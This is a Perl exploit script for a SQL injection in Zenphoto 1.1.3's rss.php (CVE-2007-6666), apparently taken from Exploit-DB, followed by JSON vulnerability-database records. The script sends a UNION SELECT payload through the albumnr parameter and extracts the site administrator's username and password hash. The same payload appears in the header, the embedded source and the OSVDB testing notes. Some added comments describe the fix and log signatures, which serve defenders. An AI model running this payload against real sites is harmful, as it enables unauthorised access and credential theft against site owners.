#!/usr/bin/perl -w
#################################################################################
# #
# Zenphoto 1.1.3 SQL Injection Exploit #
# #
# Discovered by: Silentz #
# Payload: Admin Username & Hash Retrieval #
# Website: http://www.w4ck1ng.com #
# #
# Vulnerable Code (rss.php): #
# #
# $albumnr = $_GET[albumnr]; #
# #
# if ($albumnr != "") #
# { $sql = "SELECT * FROM ". prefix("images") ." WHERE albumid = $albumnr #
# AND `show` = 1 ORDER BY id DESC LIMIT ".$items;} #
# else #
# { $sql = "SELECT * FROM ". prefix("images") ." WHERE `show` = 1 ORDER #
# BY id DESC LIMIT ".$items; } #
# #
# PoC: http://victim.com/zenphoto/rss.php?albumnr=1 UNION SELECT 0,0,0,(SELECT #
# value FROM zp_options WHERE id=12),(SELECT value FROM zp_options WHERE id=13) #
# ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, #
# 0,0,0,0/* #
# #
# Subject To: Nothing! #
# GoogleDork: Get your own! #
# #
# Shoutz: The entire w4ck1ng community #
# #
# NOTE: The vulnerability exists in versions 1.1, 1.1.1, 1.1.2 & 1.1.3 BUT you'd #
# have to alter the payload in order to make it work for any versions #
# other than 1.1.3. #
# #
#################################################################################
use LWP::UserAgent;
# Proof-of-concept for CVE-2007-6666: rss.php interpolates the unvalidated
# `albumnr` GET parameter straight into a SELECT (see header), so a UNION
# SELECT appended to it is executed by the database and its result is rendered
# into the RSS feed the page returns.  The script sends one such request and
# scrapes two values out of the feed body.
#
# Defender notes: the root cause is string-built SQL; the fix is to cast
# albumnr to an integer (or bind it as a parameter) before it reaches the
# query.  In web-server logs the request is recognisable by `rss.php` with an
# `albumnr` value containing `UNION SELECT` and a trailing `/*`.
#
# Usage: the sole argument is the site base URL and it MUST end with `/`,
# because "rss.php?..." is concatenated onto it verbatim below.
die "Example: exploit.pl http://victim.com/\n" unless @ARGV;
# NOTE: `$b` is one of Perl's sort() package variables ($a/$b); reusing it as
# a user-agent handle works only because this script never calls sort, and
# `use strict` would not flag it.  The script runs without strict, so every
# variable here is a package global.
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
# User-Agent is set to a browser-looking string; filtering on User-Agent is
# therefore not a useful control for this request — match on the query string.
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
# Injected query: two subqueries read the `value` column of zp_options rows
# id=12 and id=13 (per the header: admin username and password hash); the
# surrounding zeros presumably pad the UNION to the column count of the images
# table, and `/*` comments out the remainder of the original statement.  The
# payload is appended unencoded; how LWP encodes the spaces is not checked.
$host = $ARGV[0] . "rss.php?albumnr=1 UNION SELECT 0,0,0,(SELECT value FROM zp_options WHERE id=12),(SELECT value FROM zp_options WHERE id=13),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/*";
# HTTP::Request is not use'd explicitly; it is brought in by LWP::UserAgent.
# The response status is never checked, so an error page is parsed like a feed.
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
# The first injected value is expected to surface inside the feed's
# <webMaster> element; the non-greedy capture stops at the first closing tag.
if ($answer =~ /<webMaster>(.*?)<\/webMaster>/){
print "\nBrought to you by w4ck1ng.com...\n";
print "\n[+] Admin User : $1";
}
# Any 32-character hex run anywhere in the body is reported as the hash — the
# pattern is unanchored, so an unrelated MD5-like token in the feed would be
# reported just the same.  "Exploit Failed" only means no such run was found;
# it is independent of whether the <webMaster> branch above matched.
if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n\n";}
else{print "\n[-] Exploit Failed...\n";}
# milw0rm.com [2007-12-31]
{"hash": "d3a3971100758a834c707acc1e8fba142319021e1693e31a53f4b6196c5d3601", "id": "EDB-ID:4823", "lastseen": "2016-01-31T21:51:07", "enchantments": {"vulnersScore": 7.5}, "bulletinFamily": "exploit", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/4823/", "description": "Zenphoto 1.1.3 (rss.php albumnr) Remote SQL Injection Exploit. CVE-2007-6666. Webapps exploit for php platform", "title": "Zenphoto 1.1.3 rss.php albumnr Remote SQL Injection Exploit", "sourceData": "#!/usr/bin/perl -w\n\n#################################################################################\n# #\n# Zenphoto 1.1.3 SQL Injection Exploit #\n# #\n# Discovered by: Silentz #\n# Payload: Admin Username & Hash Retrieval #\n# Website: http://www.w4ck1ng.com #\n# #\n# Vulnerable Code (rss.php): #\n# #\n# $albumnr = $_GET[albumnr];\t\t\t\t\t\t#\n# \t \t\t\t\t\t\t\t\t\t#\n# if ($albumnr != \"\")\t\t\t\t\t\t\t#\n#\t{ $sql = \"SELECT * FROM \". prefix(\"images\") .\" WHERE albumid = $albumnr #\n# AND `show` = 1 ORDER BY id DESC LIMIT \".$items;}\t\t\t#\n# else\t\t\t\t\t\t\t\t\t#\n# \t{ $sql = \"SELECT * FROM \". prefix(\"images\") .\" WHERE `show` = 1 ORDER \t#\n# BY id DESC LIMIT \".$items; }\t\t\t\t\t\t#\n# #\n# PoC: http://victim.com/zenphoto/rss.php?albumnr=1 UNION SELECT 0,0,0,(SELECT #\n# value FROM zp_options WHERE id=12),(SELECT value FROM zp_options WHERE id=13) # \n# ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, #\n# 0,0,0,0/*\t #\n# #\n# Subject To: Nothing!\t\t\t #\n# GoogleDork: Get your own! #\n# #\n# Shoutz: The entire w4ck1ng community #\n# #\n# NOTE: The vulnerbility exists in versions 1.1, 1.1.1, 1.1.2 & 1.1.3 BUT you'd #\n# have to alter the payload in order to make it work for any versions #\n# other than 1.1.3. 
\t\t\t\t\t\t\t#\n#\t\t\t\t\t\t\t\t\t\t#\n#################################################################################\n\nuse LWP::UserAgent;\ndie \"Example: exploit.pl http://victim.com/\\n\" unless @ARGV;\n\n$b = LWP::UserAgent->new() or die \"Could not initialize browser\\n\";\n$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');\n\n$host = $ARGV[0] . \"rss.php?albumnr=1 UNION SELECT 0,0,0,(SELECT value FROM zp_options WHERE id=12),(SELECT value FROM zp_options WHERE id=13),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/*\";\n\n$res = $b->request(HTTP::Request->new(GET=>$host));\n$answer = $res->content;\n\nif ($answer =~ /<webMaster>(.*?)<\\/webMaster>/){\n print \"\\nBrought to you by w4ck1ng.com...\\n\";\n print \"\\n[+] Admin User : $1\";\n}\n\nif ($answer =~/([0-9a-fA-F]{32})/){print \"\\n[+] Admin Hash : $1\\n\\n\";}\n\nelse{print \"\\n[-] Exploit Failed...\\n\";}\n\n# milw0rm.com [2007-12-31]\n", "objectVersion": "1.0", "cvelist": ["CVE-2007-6666"], "viewCount": 1, "published": "2007-12-31T00:00:00", "osvdbidlist": ["39786"], "references": [], "reporter": "Silentz", "modified": "2007-12-31T00:00:00", "href": "https://www.exploit-db.com/exploits/4823/"}
{"result": {"cve": [{"id": "CVE-2007-6666", "type": "cve", "title": "CVE-2007-6666", "description": "SQL injection vulnerability in rss.php in Zenphoto 1.1 through 1.1.3 allows remote attackers to execute arbitrary SQL commands via the albumnr parameter.", "published": "2008-01-04T06:46:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-6666", "cvelist": ["CVE-2007-6666"], "lastseen": "2017-09-29T14:25:39"}], "nessus": [{"id": "FREEBSD_PKG_1A818749D64611DC8959000BCDC1757A.NASL", "type": "nessus", "title": "FreeBSD : zenphoto -- XSS vulnerability (1a818749-d646-11dc-8959-000bcdc1757a)", "description": "zenphoto project reports :\n\nA new zenphoto version is now available. This release contains security fixes for HTML, XSS, and SQL injection vulnerabilities.", "published": "2008-02-11T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=30241", "cvelist": ["CVE-2007-6666"], "lastseen": "2017-10-29T13:44:28"}, {"id": "ZENPHOTO_ALBUMNR_SQL_INJECTION.NASL", "type": "nessus", "title": "Zenphoto rss.php albumnr Parameter SQL Injection", "description": "The version of Zenphoto installed on the remote host fails to sanitize input to the 'albumnr' parameter of the 'rss.php' script before using it in a database query. 
Regardless of PHP's 'magic_quotes_gpc' and 'register_globals' settings, an attacker may be able to exploit this issue to manipulate database queries, leading to disclosure of sensitive information, modification of data, or attacks against the underlying database.", "published": "2008-01-03T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=29832", "cvelist": ["CVE-2007-6666"], "lastseen": "2017-10-29T13:41:27"}], "freebsd": [{"id": "1A818749-D646-11DC-8959-000BCDC1757A", "type": "freebsd", "title": "zenphoto -- XSS vulnerability", "description": "\nzenphoto project reports:\n\nA new zenphoto version is now available. This release contains\n\t security fixes for HTML, XSS, and SQL injection vulnerabilities.\n\t \n\n", "published": "2008-01-03T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vuxml.freebsd.org/freebsd/1a818749-d646-11dc-8959-000bcdc1757a.html", "cvelist": ["CVE-2007-6666"], "lastseen": "2016-09-26T17:24:58"}], "osvdb": [{"id": "OSVDB:39786", "type": "osvdb", "title": "Zenphoto rss.php albumnr Variable SQL Injection", "description": "## Vulnerability Description\nZenphoto contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'rss.php' script not properly sanitizing user-supplied input to the 'albumnr' variable. 
This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[target]/zenphoto/rss.php?albumnr=1 UNION SELECT 0,0,0,(SELECT value FROM zp_options WHERE id=12),(SELECT value FROM zp_options WHERE id=13),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/*\n## References:\n[Secunia Advisory ID:28281](https://secuniaresearch.flexerasoftware.com/advisories/28281/)\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4823\n[CVE-2007-6666](https://vulners.com/cve/CVE-2007-6666)\nBugtraq ID: 27084\n", "published": "2007-12-31T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:39786", "cvelist": ["CVE-2007-6666"], "lastseen": "2017-04-28T13:20:35"}], "openvas": [{"id": "OPENVAS:60396", "type": "openvas", "title": "FreeBSD Ports: zenphoto", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "published": "2008-09-04T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=60396", "cvelist": ["CVE-2007-6666"], "lastseen": "2017-07-02T21:10:21"}]}}